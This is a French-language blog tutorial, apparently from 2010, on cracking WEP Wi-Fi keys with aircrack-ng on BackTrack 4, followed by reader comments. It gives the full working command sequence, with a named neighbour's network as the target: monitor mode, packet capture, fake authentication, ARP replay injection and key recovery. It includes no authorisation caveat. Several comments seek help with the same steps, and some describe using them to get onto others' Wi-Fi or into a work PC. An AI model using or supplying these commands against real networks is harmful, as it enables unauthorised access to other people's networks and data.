The Moroccan Geek

Des bits d'information qui enrichissent votre quotidien!

Cracker une clé WEP!

La globalisation de l’information et de l’utilisation d’internet, ont permis de garantir une certaine liberté et une certaine indépendance, en permettant de créer de nouveaux concepts et de nouvelles technologies qui facilitent notre quotidien ; On n’est plus dépendant de son pc ni des câbles pour se connecter a internet et ce grâce au wifi.

Le Wireless Lan (802.11) généralement appelé Wifi « Wireless Fidelity » repose sur le modèle OSI, en négligeant (plus au moins) la partie physique puisqu’il utilise des ondes radio au lieu des câbles.

Les réseaux wifi explosent, ils sont installés dans des cafés, des entreprises, des administrations publiques et même chez le voisin et l’épicier du quartier ! Certains sont accessibles sans protection(OPEN), d’autres non…nécessitant ainsi un mot de passe ou une clé hexadécimale, implémentés en utilisant des protocoles de protection tel le WEP, WPA, WPA-PSK….

Chaque protocole a des points forts et des points faibles, et l’utilisation de chaque protocole dépend de l’utilisation et de la criticité des données qui transitent sur le réseau, par exemple : Dans une entreprise, il est préférable d’utiliser le WPA-PSK puisqu’il garantit un niveau de protection élevé par rapport au WEP, car son crackage met beaucoup de temps et nécessite l’utilisation d’un dictionnaire.

Le WEP :

Le WEP Wired Equivalent Privacy utilise l’algorithme de chiffrement par flot RC4 pour assurer la confidentialité et la somme de contrôle CRC-32 pour assurer l’intégrité.

La version 64 bits du WEP utilise une clé de chiffrement de 40 bits et un vecteur d’initialisation de 24 bits permettant ainsi d’avoir une clé RC4 de 64bits.

La version 128 bits quand a elle, est saisie comme une suite de 13 caractères ASCII ou 26 caractères hexadécimaux. Chaque doublet hexadécimal représente 8 bits de la clé WEP. 8 * 13 = 104 bits plus le vecteur d’initialisation de 24 bits.

Pour la 256 bits, 24 bits sont réservés pour le vecteur d’initialisation et 232 bits pour la clé de chiffrement. Cette clé est habituellement saisie comme une suite de 58 symboles hexadécimaux. (58 * 4 = 232 bits) + 24 = 256 bits.

Le crackage du WEP :

Le crackage du WEP passe en premier lieu par l’acquisition des outils nécessaires et d’être à une bonne distance du point d’accès afin d’accélérer l’opération du crackage .

Le principale outil nécessaire est Aircrack-Ng disponible dans la distribution BACKTRACK 4 et dans l’ensemble des distributions sécurité, mais aussi sous Windows, a condition que votre carte wifi soit compatible et qu’elle permet le passage au mode Monitor.

Une grande partie des drivers des cartes wifi disponibles sur le marché ont été intégrés sur la BACKTRACK, mais elles ne garantissent pas toutes, le passage au mode monitor comme le cas de la BROADCOM BCM4310 utilisé lors de la démonstration.

Afin de remédier a ce problème, la recompilation du noyau et le passage a la version 2.6.32.2 étaient nécessaires.

En plus de AIRCRACK-NG, le AIRMON-NG qui permet d’activer le mode monitor, AIRODUMP qui permet de récupérer les paquets, et AIREPLAY-NG qui permet de lancer des attaques de fausse authentification et des ARP-REQ/ACK, sont nécessaires (intégrés par défaut sous BACKTRACK.)

La BACKTRACK seule ne permet pas de cracker les WEP, il vous faut aussi etre prêt du réseau que vous voulez cracker, afin d’accélerer le processus de crackage, et sans oublier qu’il faut etre patient car des fois meme si le signal est égal a 0 ou plus (+), la récuperation des paquets et le crackage peut prendre plus de 3min (meme 1heure et plus !).

La colonne PWR indiquera la force du signal wifi de chaque point d’accès(réseau !)

Le crackage :

La première étape dans le processus de crackage sera de vérifier si le mode monitor marche sur la carte wifi :

Une nouvelle interface logique sera crée sous le nom de mon0.

Ensuite la commande Airodump sera lancé pour écouter sur l’interface mon0 et détecter les réseaux wifi disponible.

Une fois lancée, on aura l’ensemble des réseaux disponibles comme suit :

La cible de notre opération sera le réseau « cyber_yassmina » protégé en WEP.

3-On ouvre un nouveau Shell, et on tape la commande suivante :

airodump-ng -c (channel) -w (file name) –bssid (bssid) (interface)

Dans notre cas, la commande sera comme suit :

airodump-ng -c 11 -w yasmina –bssid 00:18:6E:08:06:BF mon0

Le bssid correspond à l’adresse mac du point d’accès (routeur wifi).

Le résultat ressemble à celui de l’ancienne commande sauf qu’ici on aura seulement les paquets qui transitent sur le réseau « cyber_yassmina ».

4-Une fois la commande de capture exécutée, on laisse le Shell ouvert et on ouvre un autre, pour faire une fausse authentification sur le routeur, afin de pouvoir lancer une autre attaque et qui est primordiale dans le crack du WEP.

Pour faire la fausse authentification rien de plus simple :

aireplay-ng -1 0 -a (bssid) -h (@ mac de l’attaquant) -e (essid) (interface)

La commande ressemblera à ceci :

aireplay-ng -1 0 -a 00:18:6E:08:06:BF -h 00:11:22:33:44:55 -e cyber_yasmina mon0

-1 : identifiant de l’attaque « Fausse authentification »

0 : le temps entre les essaies en cas d’échec de l’authentification.

-a : paramètre pour assigner le Bssid (@ mac du routeur)

-h : paramètre pour assigner l’@ mac de l’attaquant afin qu’elle puisse être authentifiée.

-e : paramètre pour assigner le nom du réseau.

Si vous avez « association successful » avec le petit smiley, ca veut dire que vous êtes authentifié sur le router.

5-Après la fausse authentification, une autre commande doit être exécuté afin de lancé des requêtes ARP et recevoir les ARP-ACK.

aireplay-ng -3 -b (bssid) -h (@mac de l’attaquant) (interface)

la commande ressemblera a ceci :

aireplay-ng -3 -b 00:18:6E:08:06:BF -h 00:11:22:33:44:55 mon0

-3 : identifiant de l’attaque ARP.

-b : paramètre pour assigner le Bssid (@ mac du routeur)

-h : paramètre pour assigner l’@ mac de l’attaquant afin qu’elle puisse être authentifiée.

6-On revient au Shell ou on a exécuté La capture des paquets, on remarque que va la colonne DATA s’incrémente.

La valeur de cette colonne est très importante car elle reflète le nombre de paquets capturés, car il faut en général 10000ARP pour cracker une clé WEP 64, plus de 40000 pour une clé 128 et plus de 100000 pour une clé WEP 256.

7-Une fois les paquets nécessaires capturés, le crackage peut se faire.

Pour cela on va utiliser le fichier Yasmina ou sont capturés les données a l’aide de la commande Airodump et qui portera l’extension .Cap

aircrack-ng -b (bssid) (file name-01.cap)

la commande nécessaire dans notre cas de figure sera :

aircrack-ng -b 00:18:6E:08:06:BF yasmina-01.cap

Il ne nous reste qu’à copier la clé sans les ( : ) et la collé dans l’invite du mot de passe lors de la connexion au réseau.

16 responses to “Cracker une clé WEP!

  1. kevin 3 September 2010 at 9:32 am

    salut
    je suis novice sur le crack wep.jai le backtrack 4 release 1 que j’ai telecharger sur remote-exploit.org.le probleme est que quand j l boot j n’arrive pas a atteindre ton depart pour pouvoir continuer.
    peut tu m’expliquer a partir du debut.au depart sa me dit screen no found.

  2. CCrdz 12 September 2010 at 7:20 pm

    Déjà, un grand merci pour ce tuto, il est rare d’en voire d’aussi bien fait en français et pour backtrack4. Sinon, pour arriver sur l’ecrant, cherche un peut sur internet et tu trouvera (trop long a expliquer).

  3. nab 14 September 2010 at 3:15 pm

    Bonjour,

    je rencontre toujours le même problème finale: Problème avec l’adresse MAC alors que j’ai essayé avec 2 réseaux Wep différents dont le signale est faible. Est-ce le problème? Même si je le laisse tourner de nombreuses heures?

    Un grand MERCI d’avance pour ta réponse.

  4. Atef 15 September 2010 at 12:53 pm

    Bonjour, et merci pour le tuto !

    en suivant votre tuto , et même d’autres (mais c’est éxactement la même démarche), j’ai toujours le même problème

    ETAPE 5 : aireplay-ng -3 -b (bssid) -h (@mac de l’attaquant) (interface)

    la commande se lance correctement , Read Packets s’incrémente mais les ARP et les ACKS restent à 0.

    du coté de airodump, data ne grimpe pas !

    en fait il n’y a pas de trafic sur le routeur cible , et à ma conaissance , cette etape 5 c’est pour générer du traffic …commment faire svp ?

  5. Merco 18 September 2010 at 8:03 pm

    Salut Atef,
    j’ai le même problème que vous, je pense
    que c’est lié à votre carte wifi !
    elle n’injecte rien …
    Prochainement je vais essayer avec une
    DWL-G520 qui elle semble injecter.
    Vous tiens au jus
    bye bye

  6. Iceman1 11 October 2010 at 12:10 am

    Salut!
    Merci pour le tuto,
    Pourquoi quand je tappe la 2eme ligne il faut que je tappe : airodump-ng mon0 que ça ne marche pas masi : airodump-ng wlan0 ça marche et quand je fais : airodump-ng -c=canal -w=le nom -b bssid= # wlan0 ça ne fonctionne pas je ne sais plus quoi faire.
    Merci!

  7. S 10 November 2010 at 12:13 am

    Best tuto EVER…
    It took me 10 mins after using backtrack on my USB key to get the key.
    Great job🙂 For security purposes only!

  8. TiBounise 8 December 2010 at 8:55 pm

    Merci mec pour ce tuto ! Je pars demain en Allemagne et j’ai besoin de wifi. MERCI !!!

  9. bensayen 6 February 2011 at 4:24 pm

    bonjours
    alors voila dans le tuto tu (il) mais entre parethése mac ce qui veut dire quoi ??????

  10. bensayen 6 February 2011 at 5:12 pm

    et aussi sa marche pou cle wap

  11. Durden 28 February 2011 at 2:29 pm

    Le (MAC) veut dire adresse MAC. Ne pas confondre avec machintosh…Tous les ordi (pc, apple…) connecté à un réseau ont une adresse MAC.

  12. ZAKI 19 March 2011 at 10:31 am

    SALUT MON PETIT PROBLÈME C’EST QUE J’AI RÉUSSIT A AUTHENTIFICATION MAIS L’ASSOCIATION NE RÉUSSIT PAS … EST CE QUE JE SUIS BESOIN D’UN CLE WIFI USB OU QUOI??
    MERCI D’AVANCE

  13. ENOLIA23 18 April 2011 at 2:17 pm

    Bonjour et super merci pour ton tuto , j’ai la version boot usb de backtrack 4f et donc quand je démarre je me log en root / toor et après je bloque , j’ai chercher sur google mais peu d’info en français et hélas l’anglais et moi …. a l’origine je me suis mis backtrack en usb pour craquer mon MDP admin sur mon pc de travail mais idem pas réussi … oui je suis noob je fais cela pour le plaisir de découvrir , qui peu m’orienter svp

  14. indigus 13 July 2011 at 8:26 pm

    ENOLIA23, après tu tapes “startx”, gaffe !!! tu es en clavier qwerty, donc tu tapes “stqrtx”, enjoy !!

  15. Don 7 August 2011 at 3:01 pm

    Slt
    Svp quelle est la duree de traitement ??,,parceque je reste bloque sur l avant derniere etape
    Il test et cela fait 1h je trouve que c est lent !!
    Il est sur l etape READ et les chifres defilent mais j trouve que c lent ..

  16. akf 18 September 2011 at 6:18 am

    slt bon tuto j’ai un petit souci
    moi j’utilise Virtual Box pour lancer Bactrack et ça marche bien mais quand j’arrice dans la console et que je tape “iwconfig” j’ai ceci
    lo no wirless entensions
    eth0 no wirless extensions

    ou alors quand je tape airmon -ng
    j’ai: interface chipset driver

    et puis rien

    QUELQU’UN PEUT IL M’AIDER???????

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: